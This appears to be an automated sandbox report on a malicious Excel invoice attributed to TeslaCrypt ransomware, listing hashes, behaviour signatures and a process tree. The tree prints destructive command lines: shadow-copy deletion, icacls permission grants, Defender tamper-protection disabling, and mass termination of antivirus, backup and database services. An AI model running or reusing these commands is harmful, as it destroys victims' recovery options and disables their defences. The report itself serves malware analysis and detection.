Analysis
-
max time kernel
150s -
max time network
129s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
22/01/2021, 07:41
Static task
static1
Behavioral task
behavioral1
Sample
invoice_NQ_Supply.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
invoice_NQ_Supply.xls
Resource
win10v20201028
General
-
Target
invoice_NQ_Supply.xls
-
Size
83KB
-
MD5
50fecec126570e4b8fcd531d6711879a
-
SHA1
9166aee4a6815e4f67e0ae43344d8ca144958d47
-
SHA256
c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71
-
SHA512
5f6d88626024811fd05af98d35a2e54a87ce5c8929d56c8bc49d718417b3370af7aa9a66c46007c600c5ec608a0f91f1e952738ee35cd3aebe28b4db46a2c042
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Signatures
-
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
-
Executes dropped EXE 2 IoCs
pid Process 4468 GZTJoxx.exe 4512 wqm58yk7.exe -
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk wqm58yk7.exe -
Modifies file permissions 1 TTPs 3 IoCs
pid Process 7300 icacls.exe 7320 icacls.exe 7312 icacls.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features wqm58yk7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" wqm58yk7.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 4 IoCs
resource yara_rule behavioral2/files/0x0002000000015661-8.dat nsis_installer_1 behavioral2/files/0x0002000000015661-8.dat nsis_installer_2 behavioral2/files/0x0002000000015661-9.dat nsis_installer_1 behavioral2/files/0x0002000000015661-9.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 14944 net.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Kills process with taskkill 48 IoCs
pid Process 9176 taskkill.exe 9104 taskkill.exe 9084 taskkill.exe 8912 taskkill.exe 8432 taskkill.exe 8384 taskkill.exe 4648 taskkill.exe 9136 taskkill.exe 8924 taskkill.exe 8452 taskkill.exe 9184 taskkill.exe 9144 taskkill.exe 9052 taskkill.exe 9016 taskkill.exe 9000 taskkill.exe 8440 taskkill.exe 8424 taskkill.exe 8400 taskkill.exe 9160 taskkill.exe 8348 taskkill.exe 9120 taskkill.exe 8980 taskkill.exe 8376 taskkill.exe 8312 taskkill.exe 8244 taskkill.exe 8196 taskkill.exe 9152 taskkill.exe 8948 taskkill.exe 8884 taskkill.exe 8332 taskkill.exe 8264 taskkill.exe 9128 taskkill.exe 9192 taskkill.exe 9112 taskkill.exe 9068 taskkill.exe 9028 taskkill.exe 8224 taskkill.exe 9208 taskkill.exe 9008 taskkill.exe 8972 taskkill.exe 8940 taskkill.exe 8416 taskkill.exe 8408 taskkill.exe 8212 taskkill.exe 8204 taskkill.exe 9200 taskkill.exe 8964 taskkill.exe 9168 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4660 reg.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4688 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe 4512 wqm58yk7.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeDebugPrivilege 4512 wqm58yk7.exe Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 4648 taskkill.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 9104 taskkill.exe Token: SeDebugPrivilege 8400 taskkill.exe Token: SeDebugPrivilege 8212 taskkill.exe Token: SeDebugPrivilege 9136 taskkill.exe Token: SeDebugPrivilege 8416 taskkill.exe Token: SeDebugPrivilege 9152 taskkill.exe Token: SeDebugPrivilege 8440 taskkill.exe Token: SeDebugPrivilege 8948 taskkill.exe Token: SeDebugPrivilege 9084 taskkill.exe Token: SeDebugPrivilege 9184 taskkill.exe Token: SeDebugPrivilege 8884 taskkill.exe Token: SeDebugPrivilege 9000 taskkill.exe Token: SeDebugPrivilege 9068 taskkill.exe Token: SeDebugPrivilege 9120 taskkill.exe Token: SeDebugPrivilege 9016 taskkill.exe Token: SeDebugPrivilege 8384 taskkill.exe Token: SeDebugPrivilege 8348 taskkill.exe Token: SeDebugPrivilege 8224 taskkill.exe Token: SeDebugPrivilege 8312 taskkill.exe Token: SeDebugPrivilege 9008 taskkill.exe Token: SeDebugPrivilege 9168 taskkill.exe Token: SeDebugPrivilege 9128 taskkill.exe Token: SeDebugPrivilege 8972 taskkill.exe Token: SeDebugPrivilege 9144 taskkill.exe Token: SeDebugPrivilege 9160 taskkill.exe Token: SeDebugPrivilege 8408 taskkill.exe Token: SeDebugPrivilege 8424 taskkill.exe Token: SeDebugPrivilege 9200 taskkill.exe Token: SeDebugPrivilege 9192 taskkill.exe Token: SeDebugPrivilege 9112 taskkill.exe Token: SeDebugPrivilege 8964 taskkill.exe Token: SeDebugPrivilege 9028 taskkill.exe Token: SeDebugPrivilege 8332 taskkill.exe Token: SeDebugPrivilege 8452 taskkill.exe Token: SeDebugPrivilege 9208 taskkill.exe Token: SeDebugPrivilege 8980 taskkill.exe Token: SeDebugPrivilege 8204 taskkill.exe Token: SeDebugPrivilege 8196 taskkill.exe Token: SeDebugPrivilege 9052 taskkill.exe Token: SeDebugPrivilege 8912 taskkill.exe Token: SeDebugPrivilege 8432 taskkill.exe Token: SeDebugPrivilege 9176 taskkill.exe Token: SeDebugPrivilege 8244 taskkill.exe Token: SeDebugPrivilege 8376 taskkill.exe Token: SeDebugPrivilege 8264 taskkill.exe Token: SeDebugPrivilege 8940 taskkill.exe Token: SeDebugPrivilege 7384 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4512 wqm58yk7.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 4512 wqm58yk7.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE 4688 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4688 wrote to memory of 4468 4688 EXCEL.EXE 81 PID 4688 wrote to memory of 4468 4688 EXCEL.EXE 81 PID 4688 wrote to memory of 4468 4688 EXCEL.EXE 81 PID 4468 wrote to memory of 4512 4468 GZTJoxx.exe 82 PID 4468 wrote to memory of 4512 4468 GZTJoxx.exe 82 PID 4468 wrote to memory of 4512 4468 GZTJoxx.exe 82 PID 4512 wrote to memory of 640 4512 wqm58yk7.exe 83 PID 4512 wrote to memory of 640 4512 wqm58yk7.exe 83 PID 4512 wrote to memory of 640 4512 wqm58yk7.exe 83 PID 4512 wrote to memory of 4648 4512 wqm58yk7.exe 85 PID 4512 wrote to memory of 4648 4512 wqm58yk7.exe 85 PID 4512 wrote to memory of 4648 4512 wqm58yk7.exe 85 PID 4512 wrote to memory of 4652 4512 wqm58yk7.exe 921 PID 4512 wrote to memory of 4652 4512 wqm58yk7.exe 921 PID 4512 wrote to memory of 4652 4512 wqm58yk7.exe 921 PID 4512 wrote to memory of 4660 4512 wqm58yk7.exe 87 PID 4512 wrote to memory of 4660 4512 wqm58yk7.exe 87 PID 4512 wrote to memory of 4660 4512 wqm58yk7.exe 87 PID 4512 wrote to memory of 2364 4512 wqm58yk7.exe 90 PID 4512 wrote to memory of 2364 4512 wqm58yk7.exe 90 PID 4512 wrote to memory of 2364 4512 wqm58yk7.exe 90 PID 4512 wrote to memory of 2480 4512 wqm58yk7.exe 91 PID 4512 wrote to memory of 2480 4512 wqm58yk7.exe 91 PID 4512 wrote to memory of 2480 4512 wqm58yk7.exe 91 PID 4512 wrote to memory of 220 4512 wqm58yk7.exe 920 PID 4512 wrote to memory of 220 4512 wqm58yk7.exe 920 PID 4512 wrote to memory of 220 4512 wqm58yk7.exe 920 PID 4512 wrote to memory of 200 4512 wqm58yk7.exe 94 PID 4512 wrote to memory of 200 4512 wqm58yk7.exe 94 PID 4512 wrote to memory of 200 4512 wqm58yk7.exe 94 PID 4512 wrote to memory of 4540 4512 wqm58yk7.exe 919 PID 4512 wrote to memory of 4540 4512 wqm58yk7.exe 919 PID 4512 wrote to memory of 4540 4512 wqm58yk7.exe 919 PID 4512 wrote to memory of 2944 4512 wqm58yk7.exe 96 PID 4512 wrote to memory of 2944 4512 wqm58yk7.exe 96 PID 4512 wrote to memory of 2944 4512 wqm58yk7.exe 96 PID 4512 wrote to memory of 2696 4512 wqm58yk7.exe 916 PID 4512 wrote to memory of 2696 4512 wqm58yk7.exe 916 PID 4512 wrote to memory of 2696 4512 wqm58yk7.exe 916 PID 4512 wrote to memory of 1496 4512 wqm58yk7.exe 915 PID 4512 wrote to memory of 1496 4512 wqm58yk7.exe 915 PID 4512 wrote to memory of 1496 4512 wqm58yk7.exe 915 PID 4512 wrote to memory of 2108 4512 wqm58yk7.exe 914 PID 4512 wrote to memory of 2108 4512 wqm58yk7.exe 914 PID 4512 wrote to memory of 2108 4512 wqm58yk7.exe 914 PID 4512 wrote to memory of 4800 4512 wqm58yk7.exe 100 PID 4512 wrote to memory of 4800 4512 wqm58yk7.exe 100 PID 4512 wrote to memory of 4800 4512 wqm58yk7.exe 100 PID 4512 wrote to memory of 5088 4512 wqm58yk7.exe 912 PID 4512 wrote to memory of 5088 4512 wqm58yk7.exe 912 PID 4512 wrote to memory of 5088 4512 wqm58yk7.exe 912 PID 4512 wrote to memory of 1940 4512 wqm58yk7.exe 102 PID 4512 wrote to memory of 1940 4512 wqm58yk7.exe 102 PID 4512 wrote to memory of 1940 4512 wqm58yk7.exe 102 PID 4512 wrote to memory of 3616 4512 wqm58yk7.exe 103 PID 4512 wrote to memory of 3616 4512 wqm58yk7.exe 103 PID 4512 wrote to memory of 3616 4512 wqm58yk7.exe 103 PID 4512 wrote to memory of 3484 4512 wqm58yk7.exe 104 PID 4512 wrote to memory of 3484 4512 wqm58yk7.exe 104 PID 4512 wrote to memory of 3484 4512 wqm58yk7.exe 104 PID 4512 wrote to memory of 3176 4512 wqm58yk7.exe 105 PID 4512 wrote to memory of 3176 4512 wqm58yk7.exe 105 PID 4512 wrote to memory of 3176 4512 wqm58yk7.exe 105 PID 4512 wrote to memory of 3552 4512 wqm58yk7.exe 107
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\invoice_NQ_Supply.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\wCmfmRe\dtwzrQf\GZTJoxx.exe"C:\wCmfmRe\dtwzrQf\GZTJoxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"3⤵
- Executes dropped EXE
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F4⤵
- Modifies registry key
PID:4660
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F4⤵PID:2364
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto4⤵PID:2480
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin4⤵PID:200
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes4⤵PID:2944
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled4⤵PID:4800
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled4⤵PID:1940
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3524
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled4⤵PID:3616
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y4⤵PID:3484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y5⤵PID:4452
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y4⤵PID:3176
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y5⤵PID:1392
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y4⤵PID:3552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y5⤵PID:2212
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y4⤵PID:4428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y5⤵PID:1800
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y4⤵PID:1580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y5⤵PID:3920
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y4⤵PID:2188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y5⤵PID:4972
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y4⤵PID:532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y5⤵PID:3300
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y4⤵PID:1780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y5⤵PID:4868
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y4⤵PID:1144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y5⤵PID:3568
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y4⤵PID:892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y5⤵PID:1296
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y4⤵PID:2104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y5⤵PID:3604
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y4⤵PID:4144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y5⤵PID:5696
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y4⤵PID:4036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y5⤵PID:7584
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y4⤵PID:3256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y5⤵PID:9604
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y4⤵PID:1100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y5⤵PID:7416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y4⤵PID:4544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y5⤵PID:9596
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y4⤵PID:2924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y5⤵PID:10924
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y4⤵PID:5216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y5⤵PID:11760
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y4⤵PID:6768
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y5⤵PID:15036
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y4⤵PID:7992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y5⤵PID:14088
-
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:7300
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:7320
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:7312
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }4⤵
- Suspicious use of AdjustPrivilegeToken
PID:7384
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9208
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9200
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9192
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9184
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9176
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9168
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9160
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9152
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9144
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9136
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9128
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9120
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9112
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9104
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9084
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9068
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9052
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9028
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9016
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9008
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9000
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8980
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8972
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8964
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8948
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8940
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F4⤵
- Kills process with taskkill
PID:8924
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8912
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8884
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8452
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8440
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8432
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8424
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8416
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8408
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8400
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8384
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8376
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8348
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8332
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8312
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8264
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8244
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8224
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8212
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8204
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y4⤵PID:7520
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y4⤵PID:2136
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y4⤵PID:2456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y4⤵PID:7176
-
-
